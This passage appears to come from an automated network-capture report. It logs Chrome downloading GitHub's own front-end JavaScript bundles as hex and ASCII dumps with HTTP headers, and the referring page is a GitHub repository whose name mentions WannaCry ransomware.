                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_github_ref-selector_ts"],{82735:(e,t,i)=>{var s=i(46037),r=i(69567),n=i(76006),h=i(6570);function a(e,t,i,s){var r,n=arguments.length,h=n<3?t:null===s?s=Object.g
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 73 2e 72 65 73 69 7a 65 41 6e 69 6d 61 74 69 6f 6e 52 65 71 75 65 73 74 29 2c 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 72 65 73 69 7a 65 22 2c 74 68 69 73 2e 77 69 6e 64 6f 77 52 65 73 69 7a 65 64 29 7d 75 70 64 61 74 65 56 69 65 77 70 6f 72 74 53 69 7a 65 28 29 7b 74 68 69 73 2e 69 73 4d 6f 62 69 6c 65 56 69 65 77 70 6f 72 74 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 35 34 34 2c 74 68 69 73 2e 77 69 6e 64 6f 77 48 65 69 67 68 74 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 7d 69 6e 70 75 74 45 6e 74 65 72 65 64 28 65 29 7b 74 68 69 73 2e 69 6e 70 75 74 3d 65 2e 64 65 74 61 69 6c 2c 74 68 69 73 2e 72 65 6e 64 65 72 28 29 7d 74 61 62 53 65 6c 65 63 74 65 64 28 29 7b 74 68 69 73 2e 69 6e
                                                                                      Data Ascii: s.resizeAnimationRequest),window.removeEventListener("resize",this.windowResized)}updateViewportSize(){this.isMobileViewport=window.innerWidth<544,this.windowHeight=window.innerHeight}inputEntered(e){this.input=e.detail,this.render()}tabSelected(){this.in
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 2e 72 65 70 6c 61 63 65 41 6c 6c 28 22 25 32 42 22 2c 22 2b 22 29 7d 72 65 6e 64 65 72 28 29 7b 69 66 28 74 68 69 73 2e 63 75 72 72 65 6e 74 53 65 6c 65 63 74 69 6f 6e 49 6e 64 65 78 3d 6e 75 6c 6c 2c 21 74 68 69 73 2e 69 6e 64 65 78 2e 69 73 4c 6f 61 64 69 6e 67 29 7b 69 66 28 21 74 68 69 73 2e 76 69 72 74 75 61 6c 69 7a 65 64 4c 69 73 74 29 7b 74 68 69 73 2e 69 6e 64 65 78 2e 73 65 61 72 63 68 28 74 68 69 73 2e 69 6e 70 75 74 29 2c 74 68 69 73 2e 73 65 74 75 70 56 69 72 74 75 61 6c 69 7a 65 64 4c 69 73 74 28 29 3b 72 65 74 75 72 6e 7d 74 68 69 73 2e 6c 69 73 74 43 6f 6e 74 61 69 6e 65 72 2e 73 63 72 6f 6c 6c 54 6f 70 3d 30 2c 74 68 69 73 2e 69 6e 64 65 78 2e 73 65 61 72 63 68 28 74 68 69 73 2e 69 6e 70 75 74 29 2c 74 68 69 73 2e 76 69 72 74 75 61 6c 69
                                                                                      Data Ascii: .replaceAll("%2B","+")}render(){if(this.currentSelectionIndex=null,!this.index.isLoading){if(!this.virtualizedList){this.index.search(this.input),this.setupVirtualizedList();return}this.listContainer.scrollTop=0,this.index.search(this.input),this.virtuali
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 7d 65 6c 73 65 20 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 74 68 69 73 2e 66 6f 63 75 73 46 69 72 73 74 4c 69 73 74 4d 65 6d 62 65 72 28 29 7d 29 29 7d 66 6f 63 75 73 46 69 72 73 74 4c 69 73 74 4d 65 6d 62 65 72 28 29 7b 74 68 69 73 2e 76 69 72 74 75 61 6c 69 7a 65 64 4c 69 73 74 26 26 28 74 68 69 73 2e 63 75 72 72 65 6e 74 53 65 6c 65 63 74 69 6f 6e 49 6e 64 65 78 3d 30 2c 74 68 69 73 2e 66 6f 63 75 73 49 74 65 6d 41 74 49 6e 64 65 78 28 74 68 69 73 2e 63 75 72 72 65 6e 74 53 65 6c 65 63 74 69 6f 6e 49 6e 64 65 78 29 29 7d 75 70 64 61 74 65 43 75 72 72 65 6e 74 28 65 29 7b 65 2e 74 61 72 67 65 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48
                                                                                      Data Ascii: eventDefault()}}else t.preventDefault(),t.stopPropagation(),this.focusFirstListMember()}))}focusFirstListMember(){this.virtualizedList&&(this.currentSelectionIndex=0,this.focusItemAtIndex(this.currentSelectionIndex))}updateCurrent(e){e.target instanceof H
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 74 79 6c 65 2e 6d 61 78 48 65 69 67 68 74 3d 60 24 7b 74 68 69 73 2e 6c 69 73 74 48 65 69 67 68 74 7d 70 78 60 2c 74 68 69 73 2e 76 69 72 74 75 61 6c 69 7a 65 64 4c 69 73 74 3d 6e 65 77 20 68 2e 5a 28 74 68 69 73 2e 6c 69 73 74 43 6f 6e 74 61 69 6e 65 72 2c 7b 68 65 69 67 68 74 3a 74 68 69 73 2e 6c 69 73 74 48 65 69 67 68 74 2c 72 6f 77 43 6f 75 6e 74 3a 74 68 69 73 2e 6c 69 73 74 4c 65 6e 67 74 68 2c 72 65 6e 64 65 72 52 6f 77 3a 74 68 69 73 2e 72 65 6e 64 65 72 52 6f 77 2e 62 69 6e 64 28 74 68 69 73 29 2c 72 6f 77 48 65 69 67 68 74 3a 65 3d 3e 7b 6c 65 74 20 74 3d 74 68 69 73 2e 69 73 4d 6f 62 69 6c 65 56 69 65 77 70 6f 72 74 3f 35 34 3a 33 33 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 68 6f 77 43 72 65 61 74 65 52 6f 77 26 26 65 3d 3d 3d 74 68 69 73 2e
                                                                                      Data Ascii: tyle.maxHeight=`${this.listHeight}px`,this.virtualizedList=new h.Z(this.listContainer,{height:this.listHeight,rowCount:this.listLength,renderRow:this.renderRow.bind(this),rowHeight:e=>{let t=this.isMobileViewport?54:33;return this.showCreateRow&&e===this.
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 28 74 68 69 73 2e 72 65 73 69 7a 65 41 6e 69 6d 61 74 69 6f 6e 52 65 71 75 65 73 74 29 2c 74 68 69 73 2e 72 65 73 69 7a 65 41 6e 69 6d 61 74 69 6f 6e 52 65 71 75 65 73 74 3d 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 74 68 69 73 2e 68 61 6e 64 6c 65 57 69 6e 64 6f 77 52 65 73 69 7a 65 29 7d 7d 7d 3b 61 28 5b 6e 2e 66 41 5d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2c 22 6c 69 73 74 43 6f 6e 74 61 69 6e 65 72 22 2c 76 6f 69 64 20 30 29 2c 61 28 5b 6e 2e 66 41 5d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2c 22 69 74 65 6d 54 65 6d 70 6c 61 74 65 22 2c 76 6f 69 64 20 30 29 2c 61 28 5b 6e 2e 66 41 5d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2c 22 6e 6f 4d 61 74 63 68 54 65 6d 70 6c 61 74 65 22 2c 76 6f 69 64 20 30 29 2c 61 28 5b 6e 2e 66 41 5d 2c 6f 2e
                                                                                      Data Ascii: (this.resizeAnimationRequest),this.resizeAnimationRequest=requestAnimationFrame(this.handleWindowResize)}}};a([n.fA],o.prototype,"listContainer",void 0),a([n.fA],o.prototype,"itemTemplate",void 0),a([n.fA],o.prototype,"noMatchTemplate",void 0),a([n.fA],o.
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 4b 65 79 3a 22 52 45 46 5f 53 45 4c 45 43 54 4f 52 5f 42 4f 4f 54 45 44 5f 46 52 4f 4d 5f 55 4e 43 41 43 48 45 44 5f 48 54 54 50 22 7d 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 30 34 3a 28 30 2c 6e 2e 62 29 28 7b 69 6e 63 72 65 6d 65 6e 74 4b 65 79 3a 22 52 45 46 5f 53 45 4c 45 43 54 4f 52 5f 42 4f 4f 54 45 44 5f 46 52 4f 4d 5f 48 54 54 50 5f 43 41 43 48 45 22 7d 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 28 30 2c 6e 2e 62 29 28 7b 69 6e 63 72 65 6d 65 6e 74 4b 65 79 3a 22 52 45 46 5f 53 45 4c 45 43 54 4f 52 5f 55 4e 45 58 50 45 43 54 45 44 5f 52 45 53 50 4f 4e 53 45 22 7d 29 7d 7d 73 65 61 72 63 68 28 65 29 7b 6c 65 74 20 74 3b 69 66 28 74 68 69 73 2e 73 65 61 72 63 68 54 65 72 6d 3d 65 2c 22 22 3d 3d 3d 65 29 7b 74 68 69 73 2e 63 75 72 72 65 6e 74
                                                                                      Data Ascii: Key:"REF_SELECTOR_BOOTED_FROM_UNCACHED_HTTP"});break;case 304:(0,n.b)({incrementKey:"REF_SELECTOR_BOOTED_FROM_HTTP_CACHE"});break;default:(0,n.b)({incrementKey:"REF_SELECTOR_UNEXPECTED_RESPONSE"})}}search(e){let t;if(this.searchTerm=e,""===e){this.current
                                                                                      2024-03-23 14:47:28 UTC432INData Raw: 69 73 2e 6e 61 6d 65 57 69 74 68 4f 77 6e 65 72 7d 3a 24 7b 74 68 69 73 2e 72 65 66 54 79 70 65 7d 60 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 2c 69 2c 73 2c 72 29 7b 74 68 69 73 2e 6b 6e 6f 77 6e 49 74 65 6d 73 3d 5b 5d 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 53 65 61 72 63 68 52 65 73 75 6c 74 3d 5b 5d 2c 74 68 69 73 2e 65 78 61 63 74 4d 61 74 63 68 46 6f 75 6e 64 3d 21 31 2c 74 68 69 73 2e 73 65 61 72 63 68 54 65 72 6d 3d 22 22 2c 74 68 69 73 2e 69 73 4c 6f 61 64 69 6e 67 3d 21 30 2c 74 68 69 73 2e 66 65 74 63 68 49 6e 50 72 6f 67 72 65 73 73 3d 21 31 2c 74 68 69 73 2e 66 65 74 63 68 46 61 69 6c 65 64 3d 21 31 2c 74 68 69 73 2e 72 65 66 54 79 70 65 3d 65 2c 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 3d 74 2c 74 68 69 73 2e 72 65 66 45 6e 64 70 6f 69
                                                                                      Data Ascii: is.nameWithOwner}:${this.refType}`}constructor(e,t,i,s,r){this.knownItems=[],this.currentSearchResult=[],this.exactMatchFound=!1,this.searchTerm="",this.isLoading=!0,this.fetchInProgress=!1,this.fetchFailed=!1,this.refType=e,this.selector=t,this.refEndpoi


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      125192.168.2.1649835185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC585OUTGET /assets/codespaces-1a8626dd714a.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:28 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 22030
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Fri, 23 Feb 2024 16:22:10 GMT
                                                                                      ETag: 0x8DC348B9604E6B9
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Age: 1522381
                                                                                      X-Served-By: cache-iad-kjyo7100097-IAD, cache-lga21959-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 3, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 4c8ac34c5bc82d15d02f7990bf3e361611951048
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 63 6f 64 65 73 70 61 63 65 73 22 5d 2c 7b 36 31 30 31 33 3a 28 65 2c 74 2c 6f 29 3d 3e 7b 6f 28 38 33 30 35 38 29 3b 76 61 72 20 72 3d 6f 28 37 36 30 30 36 29 2c 6e 3d 6f 28 36 39 35 36 37 29 2c 73 3d 6f 28 31 32 30 34 30 29 2c 61 3d 6f 28 35 39 37 35 33 29 2c 69 3d 6f 28 35 32 32 33 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 6c 65 74 20 74 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2e 6a 73 2d 74 6f 67 67 6c 65 2d 68 69 64 64 65 6e 22 29 3b 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 74 29 65 2e 68 69 64 64 65 6e
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["codespaces"],{61013:(e,t,o)=>{o(83058);var r=o(76006),n=o(69567),s=o(12040),a=o(59753),i=o(5223);function l(e){let t=e.querySelectorAll(".js-toggle-hidden");for(let e of t)e.hidden
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 74 63 68 45 76 65 6e 74 28 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 70 6f 6c 6c 76 73 63 6f 64 65 22 29 29 29 3a 65 2e 63 6c 6f 73 65 73 74 28 22 63 72 65 61 74 65 2d 62 75 74 74 6f 6e 22 29 26 26 28 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 72 63 22 2c 6f 2e 6c 6f 61 64 69 6e 67 5f 75 72 6c 29 2c 65 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 70 72 70 6f 6c 6c 76 73 63 6f 64 65 22 29 29 29 2c 6c 28 65 29 7d 7d 65 6c 73 65 20 69 66 28 34 32 32 3d 3d 3d 74 2e 73 74 61 74 75 73 29 7b 6c 65 74 20 6f 3d 61 77 61 69 74 20 74 2e 6a 73 6f 6e 28 29 3b 69 66 28 22 63 6f 6e 63 75 72 72 65 6e 63 79 5f 6c 69 6d 69 74 5f 65 72 72 6f 72 22 3d 3d 3d 6f 2e 65 72 72 6f 72 5f 74 79 70 65
                                                                                      Data Ascii: tchEvent(new CustomEvent("pollvscode"))):e.closest("create-button")&&(e.setAttribute("data-src",o.loading_url),e.dispatchEvent(new CustomEvent("prpollvscode"))),l(e)}}else if(422===t.status){let o=await t.json();if("concurrency_limit_error"===o.error_type
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 63 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 2e 64 65 63 6f 72 61 74 65 29 61 3d 52 65 66 6c 65 63 74 2e 64 65 63 6f 72 61 74 65 28 65 2c 74 2c 6f 2c 72 29 3b 65 6c 73 65 20 66 6f 72 28 76 61 72 20 69 3d 65 2e 6c 65 6e 67 74 68 2d 31 3b 69 3e 3d 30 3b 69 2d 2d 29 28 6e 3d 65 5b 69 5d 29 26 26 28 61 3d 28 73 3c 33 3f 6e 28 61 29 3a 73 3e 33 3f 6e 28 74 2c 6f 2c 61 29 3a 6e 28 74 2c 6f 29 29 7c 7c 61 29 3b 72 65 74 75 72 6e 20 73 3e 33 26 26 61 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6f 2c 61 29 2c 61 7d 28 5b 72 2e 49 68 5d 2c 70 29 3b 76 61 72 20 6d 3d 6f 28 38 30 37 30 32 29 2c 68 3d 6f 28 32 32 36 29 3b 66 75 6e 63 74 69 6f 6e 20 79 28 65 2c 74 2c 6f 2c 72 29 7b 76 61 72
                                                                                      Data Ascii: ct&&"function"==typeof Reflect.decorate)a=Reflect.decorate(e,t,o,r);else for(var i=e.length-1;i>=0;i--)(n=e[i])&&(a=(s<3?n(a):s>3?n(t,o,a):n(t,o))||a);return s>3&&a&&Object.defineProperty(t,o,a),a}([r.Ih],p);var m=o(80702),h=o(226);function y(e,t,o,r){var
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 7d 61 73 79 6e 63 20 64 65 63 6c 61 72 61 74 69 76 65 53 65 63 72 65 74 73 48 61 73 68 55 70 64 61 74 65 64 28 65 29 7b 6c 65 74 20 74 3d 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 2c 6f 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6e 61 6d 65 22 29 3b 69 66 28 21 6f 29 72 65 74 75 72 6e 3b 6c 65 74 20 72 3d 74 2e 76 61 6c 75 65 2c 6e 3d 28 30 2c 68 2e 4a 78 29 28 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 70 75 62 6c 69 63 2d 6b 65 79 22 29 29 3b 22 63 68 65 63 6b 62 6f 78 22 21 3d 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 29 7c 7c 74 2e 63 68 65 63 6b 65 64 7c 7c 28 72 3d 22 22 29 2c 72 3f 74 68 69 73 2e 73 65 63 72 65 74 73 5f 68 61 73 68 2e 73 65 74 28 6f 2c 28 30 2c 68 2e 63 76 29 28
                                                                                      Data Ascii: }async declarativeSecretsHashUpdated(e){let t=e.currentTarget,o=t.getAttribute("data-name");if(!o)return;let r=t.value,n=(0,h.Jx)(t.getAttribute("data-public-key"));"checkbox"!==t.getAttribute("type")||t.checked||(r=""),r?this.secrets_hash.set(o,(0,h.cv)(
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 6f 64 65 73 70 61 63 65 2d 69 64 3d 27 24 7b 65 7d 27 5d 5b 64 61 74 61 2d 63 6c 61 73 73 3d 22 70 75 62 6c 69 73 68 2d 63 6f 64 65 73 70 61 63 65 2d 66 6f 72 6d 22 5d 60 29 3b 69 66 28 74 29 7b 6c 65 74 20 65 3d 4f 62 6a 65 63 74 2e 66 72 6f 6d 45 6e 74 72 69 65 73 28 6e 65 77 20 46 6f 72 6d 44 61 74 61 28 74 29 2e 65 6e 74 72 69 65 73 28 29 29 3b 69 66 28 74 68 69 73 2e 66 6f 72 6d 29 7b 6c 65 74 20 74 3d 60 3f 6e 61 6d 65 3d 24 7b 65 2e 6e 61 6d 65 7d 26 76 69 73 69 62 69 6c 69 74 79 3d 24 7b 65 2e 76 69 73 69 62 69 6c 69 74 79 7d 60 2c 6f 3d 28 74 68 69 73 2e 66 6f 72 6d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 63 74 69 6f 6e 22 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 3f 22 29 5b 30 5d 2b 74 3b 74 68 69 73 2e 66 6f 72 6d 2e 73 65 74 41 74 74
                                                                                      Data Ascii: odespace-id='${e}'][data-class="publish-codespace-form"]`);if(t){let e=Object.fromEntries(new FormData(t).entries());if(this.form){let t=`?name=${e.name}&visibility=${e.visibility}`,o=(this.form.getAttribute("action")||"").split("?")[0]+t;this.form.setAtt
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 3b 69 2d 2d 29 28 6e 3d 65 5b 69 5d 29 26 26 28 61 3d 28 73 3c 33 3f 6e 28 61 29 3a 73 3e 33 3f 6e 28 74 2c 6f 2c 61 29 3a 6e 28 74 2c 6f 29 29 7c 7c 61 29 3b 72 65 74 75 72 6e 20 73 3e 33 26 26 61 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6f 2c 61 29 2c 61 7d 67 28 5b 72 2e 66 41 5d 2c 76 2e 70 72 6f 74 6f 74 79 70 65 2c 22 66 6f 72 6d 22 2c 76 6f 69 64 20 30 29 2c 67 28 5b 72 2e 66 41 5d 2c 76 2e 70 72 6f 74 6f 74 79 70 65 2c 22 6c 6f 61 64 69 6e 67 49 6e 64 69 63 61 74 6f 72 22 2c 76 6f 69 64 20 30 29 2c 67 28 5b 72 2e 66 41 5d 2c 76 2e 70 72 6f 74 6f 74 79 70 65 2c 22 76 69 65 77 42 72 61 6e 63 68 4c 69 6e 6b 22 2c 76 6f 69 64 20 30 29 2c 76 3d 67 28 5b 72 2e 49 68 5d 2c 76 29 2c 6f 28 38 30 35 38 33 29 2c 6f 28 38
                                                                                      Data Ascii: ;i--)(n=e[i])&&(a=(s<3?n(a):s>3?n(t,o,a):n(t,o))||a);return s>3&&a&&Object.defineProperty(t,o,a),a}g([r.fA],v.prototype,"form",void 0),g([r.fA],v.prototype,"loadingIndicator",void 0),g([r.fA],v.prototype,"viewBranchLink",void 0),v=g([r.Ih],v),o(80583),o(8
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 69 7d 29 3b 76 61 72 20 72 3d 6f 28 36 39 35 36 37 29 2c 6e 3d 6f 28 35 39 37 35 33 29 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 6c 65 74 20 72 3d 6e 65 77 20 54 65 78 74 45 6e 63 6f 64 65 72 2c 6e 3d 72 2e 65 6e 63 6f 64 65 28 74 29 2c 7b 73 65 61 6c 3a 73 7d 3d 61 77 61 69 74 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 5b 6f 2e 65 28 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 62 6c 61 6b 65 6a 73 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 74 77 65 65 74 6e 61 63 6c 5f 6e 61 63 6c 2d 66 61 73 74 5f 6a 73 22 29 2c 6f 2e 65 28 22 5f 65 6d 70 74 79 2d 66 69 6c 65 5f 6a 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 74 77 65 65 74 73 6f 64 69 75 6d 5f
                                                                                      Data Ascii: i});var r=o(69567),n=o(59753);async function s(e,t){let r=new TextEncoder,n=r.encode(t),{seal:s}=await Promise.all([o.e("vendors-node_modules_blakejs_index_js-node_modules_tweetnacl_nacl-fast_js"),o.e("_empty-file_js-app_assets_modules_github_tweetsodium_
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 28 29 7d 29 2c 28 30 2c 6e 2e 6f 6e 29 28 22 73 75 62 6d 69 74 22 2c 22 66 6f 72 6d 2e 6a 73 2d 65 6e 63 72 79 70 74 2d 62 75 6c 6b 2d 73 75 62 6d 69 74 22 2c 6c 28 21 30 29 29 2c 28 30 2c 6e 2e 6f 6e 29 28 22 73 75 62 6d 69 74 22 2c 22 66 6f 72 6d 2e 6a 73 2d 65 6e 63 72 79 70 74 2d 62 75 6c 6b 2d 73 75 62 6d 69 74 2d 65 6e 61 62 6c 65 2d 65 6d 70 74 79 22 2c 6c 28 21 31 29 29 7d 2c 38 33 30 35 38 3a 28 65 2c 74 2c 6f 29 3d 3e 7b 6f 2e 64 28 74 2c 7b 61 3a 28 29 3d 3e 69 7d 29 3b 76 61 72 20 72 3d 6f 28 33 36 30 37 31 29 2c 6e 3d 6f 28 35 39 37 35 33 29 2c 73 3d 6f 28 36 35 39 33 35 29 2c 61 3d 6f 28 38 30 37 30 32 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 6c 65 74 20 6f 3b 6c 65 74 20 72 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22
                                                                                      Data Ascii: ()}),(0,n.on)("submit","form.js-encrypt-bulk-submit",l(!0)),(0,n.on)("submit","form.js-encrypt-bulk-submit-enable-empty",l(!1))},83058:(e,t,o)=>{o.d(t,{a:()=>i});var r=o(36071),n=o(59753),s=o(65935),a=o(80702);function i(e,t){let o;let r=t.querySelector("
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 61 6c 6c 6f 77 2d 75 70 64 61 74 65 2d 75 72 6c 22 29 29 7b 6c 65 74 20 65 3d 6e 65 77 20 46 6f 72 6d 44 61 74 61 28 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 66 6f 72 6d 2e 6a 73 2d 6e 65 77 2d 63 6f 64 65 73 70 61 63 65 2d 66 6f 72 6d 22 29 29 3b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 6e 65 77 20 55 52 4c 28 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2c 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 29 2c 6f 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 74 2e 73 65 61 72 63 68 29 2c 72 3d 5b 22 76 73 63 73 5f 74 61 72 67 65 74 22 5d 3b 66 6f 72 28 6c 65 74 5b 74 2c 6e 5d 6f 66 20 65
                                                                                      Data Ascii: =o.getAttribute("data-allow-update-url")){let e=new FormData(document.querySelector("form.js-new-codespace-form"));!function(e){let t=new URL(document.location.href,window.location.origin),o=new URLSearchParams(t.search),r=["vscs_target"];for(let[t,n]of e
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 22 21 3d 3d 74 2e 76 61 6c 75 65 29 7b 6c 65 74 20 74 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 66 6f 72 6d 22 29 3b 28 30 2c 61 2e 42 74 29 28 74 29 7d 65 6c 73 65 7b 6c 65 74 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6a 73 2d 66 65 74 63 68 2d 63 61 73 63 61 64 65 2d 74 6f 6b 65 6e 22 29 3b 28 30 2c 73 2e 41 43 29 28 22 2e 6a 73 2d 66 65 74 63 68 2d 63 61 73 63 61 64 65 2d 74 6f 6b 65 6e 22 2c 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 72 79 7b 6c 65 74 20 65 3d 61 77 61 69 74 20 74 2e 6a 73 6f 6e 28 29 2c 6f 3d 65 2e 6a 73 6f 6e 3b 75 3d 6f 2e 74 6f 6b 65 6e 7d 63 61 74 63 68 28 65 29 7b 7d 7d 29 2c 28 30 2c 61 2e 42 74 29 28 65 29 2c
                                                                                      Data Ascii: ction(e,t){if(""!==t.value){let t=e.querySelector("form");(0,a.Bt)(t)}else{let e=document.querySelector(".js-fetch-cascade-token");(0,s.AC)(".js-fetch-cascade-token",async function(e,t){try{let e=await t.json(),o=e.json;u=o.token}catch(e){}}),(0,a.Bt)(e),


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      126192.168.2.1649838185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:28 UTC675OUTGET /assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_github_remote-form_-01f9fa-075cdbe1c5e3.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:28 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 22727
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 07 Mar 2024 22:48:36 GMT
